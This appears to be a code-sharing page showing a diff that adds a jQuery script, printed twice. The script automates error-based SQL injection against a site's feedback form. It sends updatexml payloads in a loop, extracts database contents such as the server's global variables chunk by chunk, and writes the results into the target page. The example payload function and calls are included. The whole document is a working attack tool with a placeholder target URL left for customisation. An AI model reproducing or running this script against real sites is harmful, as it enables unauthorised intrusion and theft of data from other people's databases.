maxvyaznikov · August 27, 2015 07:29
diff --git a/ajax93t411.js b/ajax93t411.js

 var ANS_START = " '~",
    ANS_STOP = "' SQL=",
    ANS_LIM = 31;

 function ajax93t411(start_from, lim, construct_req) {
    start_from = start_from || 0;
    lim = lim || 1; // Can be -1. -1 if for "while no Err"

    function req(i, offset, callback) {
        $.ajax({

            //-- All this params is for customization. Feel free
            url: '<path to script>',
            method: 'POST',
            data: $.param({
                type: 'feedback',
                feedbacktext: construct_req(start_from, i, offset) // Don't forget about this function to include
            }
            //---
            ),
            success: function(resp) {
                var answer = resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP));
                if (answer == ANS_ERR) {
                    callback(answer);
                } else {
                    callback(null, answer);
                }
            },
            error: function(jqXHR, textStatus) {
                callback(textStatus);
            }
        });
    }

    function constructReq(i, full_answer, offset, next) {
        req(i, offset, function(err, answer) {
            if (err) return next(err, full_answer);

            full_answer += answer;
            if (answer.length > 0) {
                constructReq(i, full_answer, offset + answer.length, next);
            } else {
                $('body').append('<p>'+ full_answer +'</p>'); // Include each new result into webpage of target site. Just for usability.
                next(null, full_answer);
            }
        });
    }

    function timesSeries(lim, i, results, callback) {
        if (i < lim) {
            constructReq(i, '', 1, function(err, answer) {
                if (err) return callback(err, results);
                results.push(answer);
                timesSeries(lim, i + 1, results, callback);
            });
        } else {
            callback(null, results);
        }
    }

    function untilErrSeries(i, results, callback) {
        constructReq(i, '', 1, function(err, answer) {
            if (err) return callback(err, results);
            results.push(answer);
            untilErrSeries(i + 1, results, callback);
        });
    }

    function complete(err, results) {
        if (err) console.error(err);
        window.INJ_RESULTS = results; // Keep all results into the global variable. Just for usability.
        console.log('Done');
    }

    $('body').append('<p><b>New Request!</b></p>');
    if (lim > 0) {
        timesSeries(lim, 0, [], complete);
    } else { // lim < 0
        untilErrSeries(0, [], complete);
    }
 }

 //=== Examples:

 // Glob. vars from DBMS
 function inj(start_from, i, offset) {
    return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':', VARIABLE_NAME, VARIABLE_VALUE), "+ offset +", "+ ANS_LIM +") FROM information_schema.GLOBAL_VARIABLES LIMIT "+ (start_from + i) +",1)), 0) or '"
 }
 ajax93t411(0, -1, inj); // All together
 ajax93t411(0, 1, inj); // Only first one
 ajax93t411(5, 6, inj); // 6 rows, begining from 5th

	var ANS_START = " '~",
	ANS_STOP = "' SQL=",
	ANS_LIM = 31;

	function ajax93t411(start_from, lim, construct_req) {
	start_from = start_from \|\| 0;
	lim = lim \|\| 1; // Can be -1. -1 if for "while no Err"

	function req(i, offset, callback) {
	$.ajax({

	//-- All this params is for customization. Feel free
	url: '<path to script>',
	method: 'POST',
	data: $.param({
	type: 'feedback',
	feedbacktext: construct_req(start_from, i, offset) // Don't forget about this function to include
	}
	//---
	),
	success: function(resp) {
	var answer = resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP));
	if (answer == ANS_ERR) {
	callback(answer);
	} else {
	callback(null, answer);
	}
	},
	error: function(jqXHR, textStatus) {
	callback(textStatus);
	}
	});
	}

	function constructReq(i, full_answer, offset, next) {
	req(i, offset, function(err, answer) {
	if (err) return next(err, full_answer);

	full_answer += answer;
	if (answer.length > 0) {
	constructReq(i, full_answer, offset + answer.length, next);
	} else {
	$('body').append('<p>'+ full_answer +'</p>'); // Include each new result into webpage of target site. Just for usability.
	next(null, full_answer);
	}
	});
	}

	function timesSeries(lim, i, results, callback) {
	if (i < lim) {
	constructReq(i, '', 1, function(err, answer) {
	if (err) return callback(err, results);
	results.push(answer);
	timesSeries(lim, i + 1, results, callback);
	});
	} else {
	callback(null, results);
	}
	}

	function untilErrSeries(i, results, callback) {
	constructReq(i, '', 1, function(err, answer) {
	if (err) return callback(err, results);
	results.push(answer);
	untilErrSeries(i + 1, results, callback);
	});
	}

	function complete(err, results) {
	if (err) console.error(err);
	window.INJ_RESULTS = results; // Keep all results into the global variable. Just for usability.
	console.log('Done');
	}

	$('body').append('<p><b>New Request!</b></p>');
	if (lim > 0) {
	timesSeries(lim, 0, [], complete);
	} else { // lim < 0
	untilErrSeries(0, [], complete);
	}
	}

	//=== Examples:

	// Glob. vars from DBMS
	function inj(start_from, i, offset) {
	return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':', VARIABLE_NAME, VARIABLE_VALUE), "+ offset +", "+ ANS_LIM +") FROM information_schema.GLOBAL_VARIABLES LIMIT "+ (start_from + i) +",1)), 0) or '"
	}
	ajax93t411(0, -1, inj); // All together
	ajax93t411(0, 1, inj); // Only first one
	ajax93t411(5, 6, inj); // 6 rows, begining from 5th